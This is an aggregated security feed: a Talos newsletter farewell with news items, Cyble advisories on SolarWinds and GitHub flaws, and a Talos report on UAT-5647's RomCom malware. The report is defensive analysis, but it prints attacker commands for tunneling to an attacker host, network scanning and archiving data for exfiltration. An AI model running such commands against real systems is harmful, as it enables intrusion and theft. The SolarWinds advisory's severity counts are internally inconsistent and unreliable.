What I’ve learned in my first 7-ish years in cybersecurity

When I first interviewed with Joel Esler for my position at Cisco Talos, I remember when the time came for me to ask questions, one thing stood out. I asked what resources were available to me to learn about cybersecurity, because I was totally new to the space.  

His answer: The people. When I asked that question, Joel told me that the entire office was a library for me. He told me to just ask as many questions as I could. 

Coming from journalism, where I was reporting on a range of topics from local government, finance and banking, art and culture, and sports, cybersecurity was totally new to me. Now almost seven years later, I’ve been able to host a podcast that went nearly 200 episodes, relaunch a cybersecurity newsletter, researched malicious Facebook groups trading stolen personal information, and I’ve even learned how to write a ClamAV signature. 

Unfortunately, this week is my last at Talos, but far from my last in cybersecurity. I’m off to a new adventure, but I wanted to take the space here to talk about what I’ve learned in my career at Talos.  

I think that this is a good lesson for anyone reading this: If you want to work in cybersecurity, you can, no matter what your background or education is. I’ve met colleagues across Talos who previously studied counterterrorism operations, German and Russian history, and political science. And I walked into my first day on the job knowing next to nothing about cybersecurity. I knew I could write, and I knew I could help Talos tell their story (and clean up the occasional passive voice in their blog posts). But I had never heard of a remote access trojan before.  

I hope these lessons resonate with you, your team, or the next person you think about hiring into the cybersecurity industry.  

You can’t do any of this without people. This has become extraordinarily relevant this year with the advent of AI. I personally have beef with the term “AI” anyway because we’ve been using machine learning in cybersecurity for years now, which is essentially what we’re using the “AI” buzzword to mean now. But at the end of the day, people are what makes cybersecurity detection work in the first place. If you don’t have a team that’s ready to put in the work necessary to write, test and improve the intelligence that goes into security products (AI or not), you’re doomed. Any of these tools are only as good as the people who put the information into them. I’ve been beyond impressed with the experience, work ethic, and knowledge that everyone in Talos has. They are what makes the engine run, and none of this would work without them. You can carve out your own niche in cybersecurity. That said, you don’t have to know how to code to work in cybersecurity if you don’t want to. Anyone can carve out their own niche in the space with their own skillset. I still barely know how to write Python, but I’ve been able to use the skills that I do have (research, writing, storytelling, audio editing, etc.) to carve out my space in cybersecurity. I can speak intelligently about security problems and solutions with my colleagues without needing to know how to reverse-engineer a piece of malware. And even on the technical side of things, everyone can carve out their own specialty. Talos has experts on email spam, and even specific types of email spam, that their colleagues may not know anything about. Others specialize in certain geographic areas because they can speak the language there and can peel back an additional layer that non-native speakers can’t.  Be a sponge. Going back to the opening of this week’s newsletter, I needed to ask hundreds of questions in my first few months at Talos. It took me a good amount of time to get over my fear of looking stupid, and that held me back early on from having more intelligent conversations with my teammates because I would keep questions inside or just assume that Google had the right answers. No matter how many years you’ve been in the security space, there is always something new to learn. Never assume you know everything there is to know on a given topic. If you are a sponge for information, you never know what new skills you can pick up along the way. When I graduated from college with a journalism degree, I never would have believed you if you told me at the time that I’d be needing to understand how atomic clocks keep power grids running. But here we are. 

The Threat Source newsletter will be off for a few weeks while it undergoes a revamp, and it’ll be back with a new look.  

I want to thank everyone who has enabled me to grow and shape this newsletter over the years, growing it to thousands of subscribers. And, of course, thanks to the readers who have engaged, read and shared over the years.  

The one big thing 

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian-speaking group we track as “UAT-5647” against Ukrainian government entities and unknown Polish entities. The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper.” This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader. 

Why do I care? 

UAT-5647 has long been considered a multi-motivational threat actor performing ransomware and espionage-oriented attacks. However, in recent months, it has accelerated its attacks with a clear focus on establishing long–term access for exfiltrating data of strategic interest to it. UAT-5647 has also evolved its tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw, a RUST-based backdoor we call DustyHammock, and a C++-based backdoor we call ShadyHammock. 

So now what? 

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against the several malware families that UAT-5647 uses.  

Top security headlines of the week 

Government and security officials are still unraveling what to make of recent revelations around multiple Chinese-state-sponsored actors infiltrating U.S. networks. Most recently, Salt Typhoon was unveiled as a new actor that may have accessed foreign intelligence surveillance systems and electronic communications that some ISPs collect. like Verizon and AT&T collect based on U.S. court orders. The actor reportedly accessed highly sensitive intelligence and law enforcement data. This followed on reports earlier this year of other Chinese state-sponsored actors Volt Typhoon and Flax Typhoon, which targeted U.S. government networks and systems on military bases. One source told the Wall Street Journal that the latest discovery of Salt Typhoon could be “potentially catastrophic.” The actor allegedly gained access to Verizon, AT&T and Lumen Technologies by exploiting systems those companies use to comply with the U.S. CALEA act, which essentially legalizes wiretapping when required by law enforcement. (Axios, Tech Crunch

Chip maker Qualcomm says adversaries exploited a zero-day vulnerability in dozens of its chipsets used in popular Android devices. While few details are currently available regarding the vulnerability, CVE-2024-43047, researchers at Google and Amnesty International say they are working with Qualcomm to remediate and responsibly disclose more information. Qualcomm listed 64 different chipsets as being affected by the vulnerability, including the company’s Snapdragon 8 mobile platform, which is used many Android phones, including some made by Motorola, Samsung and ZTE. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also added the issue to its Known Exploited Vulnerabilities catalog, indicating they can confirm it’s been actively exploited in the wild. Qualcomm said it issued a fix in September, and it is now on the device manufacturers to roll out patches to their customers for affected devices. (Android Police, Tech Crunch

As many as 14,000 medical devices across the globe are online and vulnerable to a bevy of security vulnerabilities and exploits, according to a new study. Security research firm Censys recently found the devices exposed, which “greatly raise the risk of unauthorized access and exploitation.” Forty-nine percent of the exposed devices are located in the U.S. America’s decentralized health care system is largely believed to affect the amount of vulnerable devices, because there is less coordinaton to isolate the devices or patch them when vulnerabilities are disclosed, unlike countries like the U.K., where the health care system is solely organized and managed by the government. The Censys study found that many of the networks belonging to smaller health care organizations used residential ISPs, making them inherently less secure. Others set up devices and connected them to the internet without changing the preconfigured credentials or leaving their connections unencrypted. Others had simply been misconfigured. Open DICOM and DICOM-enabled web interfaces that are intended to share and view medical images were responsible for 36 percent of the exposures, with 5,100 IPs hosting these systems. (CyberScoop, Censys

Can’t get enough Talos? 

Attackers Delight: Why Does Healthcare See So Many Attacks? Ghidra data type archive for Windows driver functions Protecting major events: An incident response blueprint 

Upcoming events where you can find Talos

MITRE ATT&CKcon 5.0 (Oct. 22 – 23) 

McLean, Virginia and Virtual

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

it-sa Expo & Congress (Oct. 22 – 24) 

Nuremberg, Germany

White Hat Desert Con (Nov. 14) 

Doha, Qatar

misecCON (Nov. 22) 

Lansing, Michigan

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

Most prevalent malware files from Talos telemetry over the past week 

There is no new data to report this week. This section will be overhauled in the next edition of the Threat Source newsletter.  

Cisco Talos Blog – ​Read More

SolarWinds Releases Patches for High-Severity Vulnerabilities

Overview

SolarWinds has issued an important security update advisory outlining the latest vulnerability patches released for its products. This advisory provides insights into recently disclosed vulnerabilities affecting the SolarWinds range and emphasizes the need for organizations to take immediate action to protect their IT infrastructure.

The advisory details various vulnerabilities and their associated risk scores, categorized by severity levels. High vulnerabilities, classified with a CVSS base score of 7.0 to 10.0, include three identified issues, specifically CVE-2024-45714, CVE-2024-45711, CVE-2024-45710, and CVE-2024-45715. These vulnerabilities carry a high-risk score and are marked with a Green TLP rating.

In addition, there is one medium vulnerability, which falls within a CVSS score range of 4.0 to 6.9 and is also rated Green. Furthermore, no vulnerabilities have been classified as low, with a score range of 0.0 to 3.9, reflecting a low-risk status.

Several products and versions have been identified as vulnerable, with patches readily available. Specifically, CVE-2024-45714 affects Serv-U version 15.4.2.3 and earlier, while CVE-2024-45711 impacts Serv-U version 15.4.2 and earlier versions. Additionally, CVE-2024-45710 and CVE-2024-45715 affect SolarWinds Platform version 2024.2.1 and all previous versions.

Detailed Vulnerability Analysis

The Cross-Site Scripting vulnerability (CVE-2024-45714) is classified with a CVSS score of 4.8, indicating a medium severity level. This vulnerability affects Serv-U version 15.4.2.3 and earlier. It allows an authenticated attacker to exploit a flaw in the system, enabling them to modify a variable using a malicious payload.

Another vulnerability is Directory Traversal (CVE-2024-45711), which carries a CVSS score of 7.5, categorizing it as high severity. This issue affects Serv-U version 15.4.2 and earlier versions. The vulnerability may allow for remote code execution, contingent upon the privileges assigned to the authenticated user. To successfully exploit this vulnerability, the attacker must have already gained authentication.

The Uncontrolled Search Path Element vulnerability, identified as CVE-2024-45710, has a CVSS score of 7.8, also indicating high severity. This vulnerability affects the SolarWinds Platform version 2024.2.1 and earlier. It can be exploited to escalate privileges locally by a low-privilege user who has access to the affected machine.

Lastly, Cross-Site Scripting (CVE-2024-45715) has a CVSS score of 7.1, placing it in the high severity category. This vulnerability impacts SolarWinds Platform version 2024.2.1 and previous versions. Affected versions are susceptible to XSS when users perform edit functions on existing elements, potentially compromising system security.

Recommendations

To mitigate the risks associated with these vulnerabilities, organizations should implement the following strategies:


Organizations must promptly apply the latest patches released by SolarWinds to all affected products.

Develop a comprehensive patch management strategy that includes inventory management, assessment, testing, deployment, and verification of patches.

Organizations should segment their networks to safeguard critical assets. This can be achieved through firewalls, VLANs, and access controls, effectively reducing the attack surface.

An incident response plan should be created and regularly tested to ensure it remains effective against evolving threats. This plan should outline procedures for detection, response, and recovery from security incidents.

Organizations are encouraged to implement comprehensive monitoring solutions to detect suspicious activities.

Proactively identify and assess the criticality of any End-of-Life (EOL) products, ensuring timely upgrades or replacements to maintain security integrity.

Conclusion

The SolarWinds platform and its Serv-U product are integral to many organizations for IT management and network monitoring. Given the history of attacks exploiting vulnerabilities in SolarWinds products, organizations need to address any newly disclosed high-severity vulnerabilities promptly. Failure to patch these vulnerabilities could expose organizations to operational and security risks.

The post SolarWinds Releases Patches for High-Severity Vulnerabilities appeared first on Cyble.

Blog – Cyble – ​Read More

GitHub Releases Security Advisory on Critical Vulnerability in Self-Hosted Environments

Overview

GitHub has issued a security advisory regarding critical vulnerabilities that require immediate attention from users of the GitHub Enterprise Server (GHES). This advisory highlights a specific vulnerability that could severely compromise organizations’ security relying on this self-hosted version of GitHub, which is tailored for those needing to manage their infrastructure, security, and compliance.

GitHub Enterprise Server is a platform that enables organizations to host their repositories while maintaining control over security protocols. However, vulnerabilities identified under the Common Vulnerabilities and Exposures (CVE) system and classified by the Common Vulnerability Scoring System (CVSS) indicate potential risks that must be addressed promptly.

CVE-2024-9487 is a critical vulnerability that impacts specific versions of GitHub Enterprise Server (GHES). It falls under the category of critical security updates and has a risk score of critical. 

The affected versions of GitHub Enterprise Server include up to 3.11.15, 3.12.9, 3.13.4, and 3.14.1. GitHub, the vendor responsible for the software, has confirmed that a patch is available to address this critical vulnerability. For organizations, accessing the patch link is essential to ensure the security of their systems.

Vulnerability Details

The identified vulnerability, CVE-2024-9487, has a CVSS score of 9.5, categorizing it as critical. This vulnerability stems from an improper verification of cryptographic signatures. It enables attackers to bypass SAML Single Sign-On (SSO) authentication, allowing unauthorized user provisioning and access to the GitHub instance.

To exploit this vulnerability, attackers need the encrypted assertions feature enabled, along with direct network access and a signed SAML response or metadata document. This combination presents a significant risk, emphasizing the urgency for organizations to implement the available patch.

The security of software development environments hinges on the timely patching critical vulnerabilities. The GitHub Enterprise Server is responsible for protecting sensitive source code, project data, and developer credentials. Unaddressed vulnerabilities can lead to severe repercussions, including data breaches, unauthorized access, and potential sabotage of the development pipeline.

Moreover, the implications extend beyond technical vulnerabilities. Failure to patch can expose organizations to regulatory penalties, particularly in environments where compliance with data protection and cybersecurity regulations is essential.

Recommendations for Organizations

To effectively mitigate risks associated with the vulnerabilities in GitHub Enterprise Server, organizations should consider the following recommendations:


Regularly update all software and hardware systems with the latest patches from official vendors. This is crucial for mitigating vulnerabilities and preventing exploits.

Organizations should establish a detailed patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification.

To protect critical assets, organizations should segment their networks. This can be accomplished using firewalls, VLANs, and access controls to limit exposure and reduce the attack surface.

Creating and maintaining an incident response plan is essential. This plan should outline procedures for detecting, responding to, and recovering from security incidents.

Organizations should implement comprehensive monitoring and logging systems to detect and analyze suspicious activities. Utilizing Security Information and Event Management (SIEM) solutions can help aggregate and correlate logs for real-time threat detection.

Organizations should proactively identify and assess the criticality of End-of-Life (EOL) products within their infrastructure.

Conclusion

Addressing the recently disclosed critical vulnerabilities in GitHub Enterprise Server is important for organizations aiming to protect their development environments. By following the recommendations outlined above, businesses can upgrade their security posture and protect against potential threats, ensuring the integrity of their software development processes. Timely action is essential to mitigate risks and uphold compliance with necessary regulations.

The post GitHub Releases Security Advisory on Critical Vulnerability in Self-Hosted Environments appeared first on Cyble.

Blog – Cyble – ​Read More

UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants

By Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer and Vitor Ventura. 

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian speaking group we track as “UAT-5647”, against Ukrainian government entities and unknown Polish entities. UAT-5647 is also known as  RomCom and is widely attributed to Russian speaking threat actors in open-source reporting.  The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to communicate with its loader.UAT-5647 has also evolved their tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw; a RUST-based backdoor we call DustyHammock; and a C++ based backdoor we call ShadyHammock.During its lateral movement, the threat actor attempted to compromise edge devices by tunneling internal interfaces to external, remote hosts controlled by UAT-5647. If successful, it would have higher chances of evading detection during the incident response process. 

UAT-5647 has long been considered a multi-motivational threat actor performing both ransomware and espionage-oriented attacks. However, UAT-5647 has accelerated their attacks in recent months with a clear focus on establishing long–term access for exfiltrating data of strategic interest to them. Our assessment, in line with recent reporting from CERT-UA and Palo Alto Networks, indicates that the threat actor is aggressively expanding their tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms such as GoLang, C++, RUST and LUA.  

Talos further assesses that this specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647’s two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise. It is also likely that Polish entities were also targeted, based on the keyboard language checks performed by the malware.

UAT-5647 infection chain 

The infection chain consists of a spear-phishing message delivering a downloader consisting of either of two variants: “RustyClaw” – a RUST-based downloader, and a C++ based variant we track as “MeltingClaw”. The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.  

DustyHammock is a more straightforward backdoor meant to be the core malicious component of the infection communicating with its command and control (C2) and performing malicious actions. ShadyHammock is, however, a two-pronged backdoor responsible for loading and activating the SingleCamper implant (RomCom malware variant) on an infected system and optionally listening for incoming commands from another malicious component. 

The overall infection chain can be visualized as: 

 

UAT-5647’s post-compromise activity 

The post-compromise activity by UAT-5647 is standard to what we would expect for a threat actor whose primary motivation is espionage. There is however one set of actions that stand out. It is our assessment that at some point the threat actor started targeting the edge devices, from inside the compromised network. This and other activities are detailed in the following sub-sections. 

Tunneling into the enterprise 

Once preliminary network reconnaissance was completed, UAT-5647 downloaded PuTTY’s Plink tool to establish remote tunnels between accessible endpoints and attacker-controlled servers [T1572]. While this is a common practice, one of the configurations was mapping the internal admin port of an edge device.

cmd /C %public%picturesiestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_INFECTED_NETWORK_:80 root@_ATTACKERS_REMOTE_IP_ -P 7722

Any traffic sent to Port 8088 on the attacker-controlled remote server will be forwarded to Port 80 on (<IP_IN_INFECTED_NETWORK>). This technique effectively exposes the application on Port 80 to the attackers allowing them to: 

Brute force or password spray to gain access to the service. Monitor and exfiltrate data and configuration from the application once access has been achieved. 

Based on URLs exposed to the threat actors now on Port 8088 such as “hxxp[://]193[.]42[.]36[.]131:8088/help/LanArpBindingListHelpRpm[.]htm”, “userRpm/VirtualServerRpm.htm”, and Censys data, it is likely that the <IP_IN_INFECTED_NETWORK> IP address is a “TP-LINK Wireless G Router WR340G”.

UAT-5647’s lateral movement and system discovery 

The threat actors were particularly interested in network reconnaissance, evident from the repeated ping sweeps they carried out to find adjoining systems [T1016]: 

powershell command 1..254 | % {ping n 1 a w 100 192.168.0.$_} | SelectString [

Once UAT-5647 deemed a specific system on the network as interesting, they can take one of two actions: 

Based on the results of the ping sweep (ICMP sweep), UAT-5647 created and executed a customized batch (BAT) file named “nv[.]bat”. The BAT file is used to run “net view” to obtain a list of shares exposed on specific IPs [T1135]:  

net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX

UAT-5647 further pinged additional endpoints in the network, this time however using their hostnames and specific IPs [T1016]: 

ping -n 1 <IP>
ping -n 1 <hostname>

A successful response from the system leads to shared folder reconnaissance [T1135]: 

dir [][]192[.]168[.]0[.]XXXc$
dir [][]<hostname>c$

They began to run highly specific port scans on it, likely to find means of obtaining unauthorized access to it: 

powershell -c $ips = @(“<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”); foreach ($ip in $ips) { foreach ($port in $ports) { if ((New-Object Net[.]Sockets[.]TcpClient)[.]Connect($ip, $port)) { “$[OPEN] $ip $port” | Out-File -Append “c:userspublicmusiclog[.]txt” } } }

Later the threat actor expanded their port scans to other IP address in the network: 

powershell -Command $ips = @(” <IP_ADDRESS>”, “<IP_ADDRESS>”, …., “<IP_ADDRESS>”, “<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”, “445”); $output = “c:userspublicmusiclog[.]txt”; foreach ($ip in $ips) { foreach ($port in $ports) { $result = Test-NetConnection -ComputerName $ip Port $port; “$ip $port : $($result[.]TcpTestSucceeded)” | OutFile Append $output } }

System and user discovery 

Even though the C2 may have automatically issued a limited set of commands to the last-stage implants, the attackers open a reverse shell (via cmd[.]exe) to conduct further reconnaissance. This activity primarily consists of user and system discovery tasks:

Commands 

MITRE ATT&CK Technique 

 

whoami 

whoami /all 

 

System Owner/User Discovery [T1003] 

 

 

chcp 

 

System Location Discovery: System Language Discovery [T1614/001] 

 

systeminfo 

ipconfig /all 

powershell -c get-volume 

tasklist 

arp -a 

net user 

tasklist /v 

netstat –ano 

 

 

 

System Information Discovery [T1082] 

 

nltest /domain_trusts 

 

 

Domain Trust Discovery [T1482] 

 

dir C:Program Files 

dir C:Users 

dir %userprofile% 

dir %userprofile%Downloads 

dir %userprofile%Desktop 

dir %userprofile%Documents 

dir %localappdata% 

dir /s C:ProgramData 

dir %LOCALAPPDATA%GoogleChromeUser DataDefault 

dir %localappdata% 

dir c:users 

dir %public% 

 

 

 

 

 

File and Directory Discovery [T1083] 

net localgroup 

net localgroup administrators 

net share 

 

Permission Groups Discovery: Local Groups [T1069/001] 

 

cmd /C reg export hkcu %public%musichkcu.txt 

cmd /C reg export hklm %public%pictureshklm.txt 

cmd /C reg query hklmsoftware 

cmd /C reg query hklmsoftware<product_name> 

cmd /C reg query hklmSYSTEMCurrentControlSetServices <product_name> /s 

 

Query Registry [T1012] 

Data exfiltration activity 

In parallel, we also observed the operators attempting to stage entire drives for exfiltration from the infected system [T1560]: 

powershell -c Compress-Archive -Path d: -DestinationPath C:Users<user>Documentsd.zip

However, they also collected specific folders on disk too. In this specific case the threat actor is exfiltrating the “Recent” folder in, what seems, an attempt to understand the victim’s latest activity on the system. 

cmd /C powershell -c Compress-Archive -Path c:users<users>appdataRoamingmicrosoftWindowsRecent -DestinationPath c:userspublicmusicrecent.zip

RustyClaw leads to DustyHammock 

RustyClaw is a RUST-based malware downloader that is targeted towards Polish, Ukrainian or Russian speaking users. The malware checks the Keyboard Layout to match one of the following language codes, before proceeding with its malicious activities: 

415 – Polish 422 – Ukrainian 419 – Russian 2000 – Unknown 

 

RustyClaw will then generate a hash for its file name to match it with a hardcoded value – this is an anti-analysis feature to prevent malware from running in sandboxes with randomized names. 

Once the checks have passed, the downloader will optionally download a decoy PDF to display to the infected user and then download the next-stage implant, DustyHammock, to locations on disk such as: 

C:Users<user>AppDataLocalKeyStorekeyprov.dll 

Then the following registry values are set to the path of the next-stage payload (keyprov[.]dll): 

HKCUSOFTWAREClassesCLSID{2155fee3-2419-4373-b102-6843707eb41f}InprocServer32 

This GUID is the CLISD for “CLSID_LocalIconCache”, that is the ThumbCache entry. It is used by explorer[.]exe while rendering the thumbnails for file icons. 

The downloader will then restart the explorer[.]exe process to load the next-stage payload DLL, DustyHammock, effectively trojanizing the process: 

cmd /C timeout 3 && taskkill /f /im explorer.exe && start explorer.exe 

DustyHammock – UAT-5647’s latest backdoor 

DustyHammock is another RUST-based backdoor. It is configured to run preliminary, hardcoded, reconnaissance commands on the infected system, gather their outputs, and send the information to its C2. The C2 then begins responding with tasks to perform on the infected system. The preliminary information collected is the MAC addresses, windows version information, and computerusername via the “whoami” and “chcp” commands. 

The backdoor has the following capabilities: 

Run arbitrary commands on the infected endpoint. Download and place files from the C2 to the infected system. Connect to an IPNS CID – likely done to download additional payloads to the infected system. The CID access by the backdoor is “/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm”. 

InterPlanetary File System (IPFS) is a peer-to-peer network allowing resource hosting in a decentralized manner. InterPlanetary Name System (IPNS), a feature of IPFS, enables mutable referencing of resources hosted on IPFS networks, allowing uploaders to modify the content of the resource without changing its identifier (CID). 

 Note that although similar in names, DustyHammock and ShadyHammock are in fact distinct implant families. ShadyHammock is coded in C++ and contains additional capabilities to bind itself and listen for incoming requests – a capability missing in DustyHammock. Although ShadyHammock consists of more features, DustyHammock seems to be the successor to it and was used as recently as September 2024 by UAT-5647. UAT-5647 likely decided to abandon additional components such as SingleCamper (loaded by ShadyHammock) in favor of a single last-stage implant, DustyHammock. 

MeltingClaw leads to ShadyHammock 

MeltingClaw is the second malware downloader UAT-5647 has used in this series of attacks. It is similar in behavior to RustyClaw with varying configurations such as file names and locations. The next-stage payload, ShadyHammock, is dropped to a similar location such as: 

C:Users<user>AppDataLocalAppTemplibapi.dll 

 

This DLL is loaded into explorer[.]exe by specifying it in the registry key: 

HKEY_USERSS-1-..-CLASSESCLSID{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}InprocServer32 

This GUID is the “Sync Registration” COM interface and is loaded into explorer[.]exe as well. 

 Apart from these capabilities that are common with RustyClaw, MeltingClaw will also download and store additional payloads in the Windows registry: 

HKEY_CURRENT_USERSoftwareAppDataSoftSoftware 

 

Registry Value Names 

Purpose and contents 

state1 

trem1 

XOR encoded SingleCamper DLL 

state2 

trem2 

XOR encoded malware DLL – currently unknow. 

state3 

trem3 

The implant version for the downloader. 
“UPDE<number>” 

 

These payloads are then loaded and activated by ShadyHammock via explorer[.]exe as illustrated next. One of the payloads is a new variant of the RomCom backdoor, we track as “SingleCamper”. The other payload is currently unknown. 

ShadyHammock – a two-pronged backdoor 

ShadyHammock is a simple and effective backdoor that carries out two primary tasks: 

Load and run payloads placed in certain registry locations (by its parent MeltingClaw). Bind to localhost and listen for incoming commands from a separate malicious component. 

 

ShadyHammock’s load-and-run capability leads to SingleCamper 

The malware will read registry locations, specifically in location: 

HKEY_CURRENT_USERSoftwareAppDataSoftSoftware 

There are usually three values in this registry key, two containing encoded copies of next stage payloads and the third containing configuration specific data such as the implant’s versions. 

The binary content of these registry values is read and decoded, resulting in a DLL that is simply traversed to find the export function. The resulting DLLs are loaded into memory to carry out more malicious activities. So far Talos has only discovered one DLL-based payload from registry, that we track as “SingleCamper”. SingleCamper, a new version of the RomCom malware, was also recently disclosed in Palo Alto’s report as SnipBot.  

The other payload is yet to be discovered (usually in the “trem2” or “state2” registry values). However, ShadyHammock already has the capability to deploy this payload on-demand provided that a specific command code is sent to it via the endpoint’s localhost interface. 

 

ShadyHammock can accept commands from SingleCamper 

ShadyHammock also consists of the ability to bind to a specific port (such as 1342) on localhost (127[.]0[.]0[.]1). Binding to localhost does not allow it to listen for incoming requests from remote hosts and is a mechanism to communicate with SingleCamper. 

 

 

ShadyHammock listening on Port 1342 

 

ShadyHammock will listen for specific command phrases based on which it performs specific actions. These actions consist of: 

delete bot”: Issuing this command will result in the backdoor being deleted from the infected host. The backdoor will delete all registry keys and folders associated with it and then restart explorer[.]exe to execute a benign, non-trojanized copy of the process. “update bot work” or “start bot file”: these commands instruct the backdoor to decode and load the payload stored in the second registry value that may have been created by MeltingClaw – “trem2” or “state2”. 

These commands are in fact issued to ShadyHammock by SingleCamper (RomCom). SingleCamper’s C2 server will issue a specific command code to it based on which the malware will generate the command phrase such as “delete bot” and send it to ShadyHammock via the localhost interface. 

 

SingleCamper issuing commands to ShadyHammock via localhost 

 

SingleCamper – an update to RomCom 

SingleCamper is the key implant in this infection that carries out all of the malicious post-compromise activities. It is loaded by ShadyHammock after being read and decoded from the Windows registry. 

SingleCamper consists of the following capabilities: 

Send preliminary system information to the C2 for registering the infection. The data is sent over Port 443  (HTTPS) in format: 

<MAC_ADDRESS>@RDPE1@@exist:<BLAH>-0:US:RDPE1::<OEM_CP_VALUE>: 

Execute preliminary reconnaissance commands sent by the C2 and respond with the results such as: nltest /domain_trusts systeminfo ipconfig /all dir C:”program Files” C:”Program Files (x86)” C:Users 

 

Based on the information received by the C2, the attackers decided whether the infected system is worth exploring further and carrying out post-compromise activities. Therefore, any commands executed by SingleCamper after these preliminary commands may be human operator issued commands. 

Receive command codes and accompanying data from the C2 and perform malicious actions on the infected system such as system information, download of additional payloads (such as PuTTY’s Plink), enumerate processes, enumerate and exfiltrate files with specific extensions such as: txt, rtf, xls, xlsx, ods, cmd, pdf, vbs, ps1, one, kdb, kdbx, doc, docx, odt, eml, msg, email. 

SingleCamper can also send commands to its loader, ShadyHammock, to perform actions on the infected endpoint. Actions include deleting the infection and loading another payload from registry – the same way ShadyHammock loads SingleCamper. 

 

Coverage 

Ways our customers can detect and block this threat are listed below. 

 

 

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

 Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

 Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

 

IOCs 

 

IOCs for this research can also be found at our GitHub repository here

 

RustyClaw 

12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9 
260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd 
9062d0f5f788bec4b487faf5f9b4bb450557e178ba114324ef7056a22b3fbe8b 
43a15c4ee10787997682b79a54ac49a90d26a126f5eeeb8569022850a2b96057 
aa09e9dca4994404a5f654be2a051c46f8799b0e987bcefef2b52412ac402105 
585ed48d4c0289ce66db669393889482ec29236dc3d04827604cf778c79fda36 
62f59766e62c7bd519621ba74f4d0ad122cca82179d022596b38bd76c7a430c4 
9fd5dee828c69e190e46763b818b1a14f147d1469dc577a99b759403a9dadf04 
b1fe8fbbb0b6de0f1dcd4146d674a71c511488a9eb4538689294bd782df040df 
7602e2c1ae27e1b36ee4aed357e505f14496f63db29fb4fcdd0d8a9db067a5c4 
f3fe04a7e8da68dc05acb7164b402ffc6675a478972cf624de84b3e2e4945b93 
10e1d453d4f9ca05ff6af3dcd7766a17ca1470ee89ba90feee5d52f8d2b18a4c 
a265ae8fed205efb5bcc2fb59e60f743f45b7ad402cb827bc98dee397069830c 
8104fdf9ff6be096b7e5011e362400ee8dd89d829c608be21eb1de959404b4b9 
b55f70467f13fbad6dde354d8653d1d6180788569496a50b06f2ece1f57a5e91 
bd25618f382fc032016e8c9bc61f0bc24993a06baf925d987dcec4881108ea2a 
78eaaf3d831df27a5bc4377536e73606cd84a89ea2da725f5d381536d5d920d8 
88a4b39fb0466ef9af2dcd49139eaff18309b32231a762b57ff9f778cc3d2dd7 
01ebc558aa7028723bebd8301fd110d01cbd66d9a8b04685afd4f04f76e7b80c 
7c9775b0f44419207b02e531c357fe02f5856c17dbd88b3f32ec748047014df8 
54ce280ec0f086d89ee338029f12cef8e1297ee740af76dda245a08cb91bab4d 
bf5f2bdc3d2acbfb218192710c8d27133bf51c1da1a778244617d3ba9c20e6f7 
fdbc6648c6f922ffcd2b351791099e893e183680fc86f48bf18815d8ae98a4f7 
ac9e3bf1cc87bc86318b258498572793d9fb082417e3f2ff17050cf6ec1d0bb5 
0a02901d364dc9d70b8fcdc8a2ec120b14f3c393186f99e2e4c5317db1edc889

 

DustyHammock 

951b89f25f7d8be0619b1dfdcc63939b0792b63fa34ebfa9010f0055d009a2d3 

 

PuTTY Plink 

2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab 

 

MeltingClaw 

45adf6f32f9b3c398ee27f02427a55bb3df74687e378edcb7e23caf6a6f7bf2a 
B9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045

 

ShadyHammock 

ce8b46370fd72d7684ad6ade16f868ac19f03b85e35317025511d6eeee288c64 
9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2 
